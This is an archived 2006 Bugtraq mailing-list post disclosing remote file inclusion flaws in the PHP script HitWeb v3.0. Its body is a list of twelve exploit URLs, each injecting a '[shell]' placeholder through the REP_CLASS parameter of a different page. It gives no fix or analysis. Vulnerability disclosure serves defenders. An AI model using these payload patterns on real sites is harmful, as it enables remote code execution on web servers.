lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: 15 Sep 2006 21:37:15 -0000
From: erne@...ealizm.com
To: bugtraq@...urityfocus.com
Subject: HitWeb v3.0 - Remote File Include Vulnerabilities

#  ERNE ---- ERNEALiZM ---- BU ASK BiTMEZ----
 
#  HitWeb v3.0 - Remote File Include Vulnerabilities
 
# site    : http://www.comscripts.com/jump.php?action=script&id=12
 
# Script  :  HitWeb v3.0
 
# Credits : ERNE
 
# Contact : erne@...ealizm.com  and irc.gigachat.net #kurdhack
 
# Thanks  : BLaCKWHITE, Blackened, Di_lejyoner
 
# Vulnerable :
 
     
         http://www.site.com/[path]/index.php?REP_CLASS=[shell]

         http://www.site.com/[path]/arbo.php?REP_CLASS=[shell]

         http://www.site.com/[path]/framepoint.php?REP_CLASS=[shell]

         http://www.site.com/[path]/genpage.php?REP_CLASS=[shell]

         http://www.site.com/[path]/lienvalider.php?REP_CLASS=[shell]
 
         http://www.site.com/[path]/appreciation.php?REP_CLASS=[shell]

         http://www.site.com/[path]/partenariat.php?REP_CLASS=[shell]

         http://www.site.com/[path]/rechercher.php?REP_CLASS=[shell]

         http://www.site.com/[path]/projet.php?REP_CLASS=[shell]
        
         http://www.site.com/[path]/proposite.php?REP_CLASS=[shell]
 
         http://www.site.com/[path]/refererpoint.php?REP_CLASS=[shell]

         http://www.site.com/[path]/top50.php?REP_CLASS=[shell]

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ